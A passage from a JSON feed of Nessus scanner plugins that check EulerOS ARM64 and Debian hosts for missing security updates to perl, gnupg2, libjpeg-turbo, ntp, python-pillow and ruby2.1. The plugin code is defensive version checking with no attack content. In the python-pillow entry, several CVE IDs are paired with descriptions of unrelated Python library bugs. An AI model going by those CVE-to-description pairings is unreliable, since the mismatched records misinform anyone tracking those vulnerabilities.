audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"perl-5.16.3-292.h12\",\n \"perl-Pod-Escapes-1.04-292.h12\",\n \"perl-libs-5.16.3-292.h12\",\n \"perl-macros-5.16.3-292.h12\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T16:49:54", "bulletinFamily": "scanner", "description": "According to the versions of the gnupg2 package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - kbx/keybox-search.c in GnuPG before 1.4.19, 2.0.x\n before 2.0.27, and 2.1.x before 2.1.2 does not properly\n handle bitwise left-shifts, which allows remote\n attackers to cause a denial of service (invalid read\n operation) via a crafted keyring file, related to sign\n extensions and ", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1563.NASL", "href": "https://www.tenable.com/plugins/nessus/136266", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : gnupg2 (EulerOS-SA-2020-1563)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136266);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2015-1606\",\n \"CVE-2015-1607\"\n );\n script_bugtraq_id(\n 72609,\n 72610\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : gnupg2 (EulerOS-SA-2020-1563)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gnupg2 package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - kbx/keybox-search.c in GnuPG before 1.4.19, 2.0.x\n before 2.0.27, and 2.1.x before 2.1.2 does not properly\n handle bitwise left-shifts, which allows remote\n attackers to cause a denial of service (invalid read\n operation) via a crafted keyring file, related to sign\n extensions and 'memcpy with overlapping\n ranges.'(CVE-2015-1607)\n\n - The keyring DB in GnuPG before 2.1.2 does not properly\n handle invalid packets, which allows remote attackers\n to cause a denial of service (invalid read and\n use-after-free) via a crafted keyring\n file.(CVE-2015-1606)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1563\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?44222924\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gnupg2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gnupg2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"gnupg2-2.0.22-5.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnupg2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-08T16:49:50", "bulletinFamily": "scanner", "description": "According to the version of the libjpeg-turbo package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerability :\n\n - libjpeg-turbo before 1.3.1 allows remote attackers to\n cause a denial of service (crash) via a crafted JPEG\n file, related to the Exif marker.(CVE-2014-9092)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1555.NASL", "href": "https://www.tenable.com/plugins/nessus/136258", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : libjpeg-turbo (EulerOS-SA-2020-1555)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136258);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2014-9092\"\n );\n script_bugtraq_id(\n 71326\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : libjpeg-turbo (EulerOS-SA-2020-1555)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the libjpeg-turbo package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerability :\n\n - libjpeg-turbo before 1.3.1 allows remote attackers to\n cause a denial of service (crash) via a crafted JPEG\n file, related to the Exif marker.(CVE-2014-9092)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1555\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2c3f00f7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libjpeg-turbo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libjpeg-turbo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"libjpeg-turbo-1.2.90-6.h5\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjpeg-turbo\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-15T17:11:08", "bulletinFamily": "scanner", "description": "The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.1 has an unsafe\nobject creation vulnerability. This is quite similar to CVE-2013-0269,\nbut does not rely on poor garbage-collection behavior within Ruby.\nSpecifically, use of JSON parsing methods can lead to creation of a\nmalicious object within the interpreter, with adverse effects that are\napplication-dependent.\n\nFor Debian 8 ", "modified": "2020-05-01T00:00:00", "id": "DEBIAN_DLA-2192.NASL", "href": "https://www.tenable.com/plugins/nessus/136202", "published": "2020-05-01T00:00:00", "title": "Debian DLA-2192-1 : ruby2.1 security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2192-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136202);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/13\");\n\n script_cve_id(\"CVE-2020-10663\");\n\n script_name(english:\"Debian DLA-2192-1 : ruby2.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.1 has an unsafe\nobject creation vulnerability. This is quite similar to CVE-2013-0269,\nbut does not rely on poor garbage-collection behavior within Ruby.\nSpecifically, use of JSON parsing methods can lead to creation of a\nmalicious object within the interpreter, with adverse effects that are\napplication-dependent.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n2.1.5-2+deb8u10.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/04/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/ruby2.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libruby2.1\", reference:\"2.1.5-2+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1\", reference:\"2.1.5-2+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-dev\", reference:\"2.1.5-2+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-doc\", reference:\"2.1.5-2+deb8u10\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-tcltk\", reference:\"2.1.5-2+deb8u10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-05-08T16:49:47", "bulletinFamily": "scanner", "description": "According to the versions of the ntp packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in\n ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via a crafted broadcast mode\n packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via the poll interval in a broadcast\n packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1547.NASL", "href": "https://www.tenable.com/plugins/nessus/136250", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : ntp (EulerOS-SA-2020-1547)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136250);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2013-5211\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\"\n );\n script_bugtraq_id(\n 64692\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : ntp (EulerOS-SA-2020-1547)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\nVirtualization for ARM 64 installation on the remote host is affected\nby the following vulnerabilities :\n\n - The monlist feature in ntp_request.c in ntpd in NTP\n before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests,\n as exploited in the wild in December\n 2013.(CVE-2013-5211)\n\n - The broadcast mode replay prevention functionality in\n ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via a crafted broadcast mode\n packet.(CVE-2016-7427)\n\n - ntpd in NTP before 4.2.8p9 allows remote attackers to\n cause a denial of service (reject broadcast mode\n packets) via the poll interval in a broadcast\n packet.(CVE-2016-7428)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1547\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bfe5fbf2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h15\",\n \"ntpdate-4.2.6p5-28.h15\",\n \"sntp-4.2.6p5-28.h15\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-05-08T16:49:39", "bulletinFamily": "scanner", "description": "According to the versions of the python-pillow package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - Integer overflow in the ImagingResampleHorizontal\n function in libImaging/Resample.c in Pillow before\n 3.1.1 allows remote attackers to have unspecified\n impact via negative values of the new size, which\n triggers a heap-based buffer overflow.(CVE-2016-4009)\n\n - An issue was discovered in urllib2 in Python 2.x\n through 2.7.17 and urllib in Python 3.x through 3.8.0.\n CRLF injection is possible if the attacker controls a\n url parameter, as demonstrated by the first argument to\n urllib.request.urlopen with \\r\\n (specifically in the\n host component of a URL) followed by an HTTP header.\n This is similar to the CVE-2019-9740 query string issue\n and the CVE-2019-9947 path string issue. (This is not\n exploitable when glibc has CVE-2016-10739\n fixed.)(CVE-2014-3589)\n\n - Python Image Library (PIL) 1.1.7 and earlier and Pillow\n 2.3 might allow remote attackers to execute arbitrary\n commands via shell metacharacters in unspecified\n vectors related to CVE-2014-1932, possibly\n JpegImagePlugin.py.(CVE-2014-3007)\n\n - The documentation XML-RPC server in Python through\n 2.7.16, 3.x through 3.6.9, and 3.7.x through 3.7.4 has\n XSS via the server_title field. This occurs in\n Lib/DocXMLRPCServer.py in Python 2.x, and in\n Lib/xmlrpc/server.py in Python 3.x. If set_server_title\n is called with untrusted input, arbitrary JavaScript\n can be delivered to clients that visit the http URL for\n this server.(CVE-2014-1933)\n\n - Directory traversal vulnerability in the (1) extract\n and (2) extractall functions in the tarfile module in\n Python allows user-assisted remote attackers to\n overwrite arbitrary files via a .. (dot dot) sequence\n in filenames in a TAR archive, a related issue to\n CVE-2001-1267.(CVE-2014-1932)\n\n - An issue was discovered in Pillow before 6.2.0. When\n reading specially crafted invalid image files, the\n library can either allocate very large amounts of\n memory or take an extremely long period of time to\n process the image.(CVE-2019-16865)\n\n - libImaging/FliDecode.c in Pillow before 6.2.2 has an\n FLI buffer overflow.(CVE-2020-5313)\n\n - libImaging/PcxDecode.c in Pillow before 6.2.2 has a PCX\n P mode buffer overflow.(CVE-2020-5312)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-05-01T00:00:00", "id": "EULEROS_SA-2020-1532.NASL", "href": "https://www.tenable.com/plugins/nessus/136235", "published": "2020-05-01T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.2.0 : python-pillow (EulerOS-SA-2020-1532)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136235);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/07\");\n\n script_cve_id(\n \"CVE-2014-1932\",\n \"CVE-2014-1933\",\n \"CVE-2014-3007\",\n \"CVE-2014-3589\",\n \"CVE-2016-4009\",\n \"CVE-2019-16865\",\n \"CVE-2020-5312\",\n \"CVE-2020-5313\"\n );\n script_bugtraq_id(\n 65511,\n 65513,\n 67150,\n 69352\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.2.0 : python-pillow (EulerOS-SA-2020-1532)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the python-pillow package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - Integer overflow in the ImagingResampleHorizontal\n function in libImaging/Resample.c in Pillow before\n 3.1.1 allows remote attackers to have unspecified\n impact via negative values of the new size, which\n triggers a heap-based buffer overflow.(CVE-2016-4009)\n\n - An issue was discovered in urllib2 in Python 2.x\n through 2.7.17 and urllib in Python 3.x through 3.8.0.\n CRLF injection is possible if the attacker controls a\n url parameter, as demonstrated by the first argument to\n urllib.request.urlopen with \\r\\n (specifically in the\n host component of a URL) followed by an HTTP header.\n This is similar to the CVE-2019-9740 query string issue\n and the CVE-2019-9947 path string issue. (This is not\n exploitable when glibc has CVE-2016-10739\n fixed.)(CVE-2014-3589)\n\n - Python Image Library (PIL) 1.1.7 and earlier and Pillow\n 2.3 might allow remote attackers to execute arbitrary\n commands via shell metacharacters in unspecified\n vectors related to CVE-2014-1932, possibly\n JpegImagePlugin.py.(CVE-2014-3007)\n\n - The documentation XML-RPC server in Python through\n 2.7.16, 3.x through 3.6.9, and 3.7.x through 3.7.4 has\n XSS via the server_title field. This occurs in\n Lib/DocXMLRPCServer.py in Python 2.x, and in\n Lib/xmlrpc/server.py in Python 3.x. If set_server_title\n is called with untrusted input, arbitrary JavaScript\n can be delivered to clients that visit the http URL for\n this server.(CVE-2014-1933)\n\n - Directory traversal vulnerability in the (1) extract\n and (2) extractall functions in the tarfile module in\n Python allows user-assisted remote attackers to\n overwrite arbitrary files via a .. (dot dot) sequence\n in filenames in a TAR archive, a related issue to\n CVE-2001-1267.(CVE-2014-1932)\n\n - An issue was discovered in Pillow before 6.2.0. When\n reading specially crafted invalid image files, the\n library can either allocate very large amounts of\n memory or take an extremely long period of time to\n process the image.(CVE-2019-16865)\n\n - libImaging/FliDecode.c in Pillow before 6.2.2 has an\n FLI buffer overflow.(CVE-2020-5313)\n\n - libImaging/PcxDecode.c in Pillow before 6.2.2 has a PCX\n P mode buffer overflow.(CVE-2020-5312)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1532\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f1ea3d72\");\n 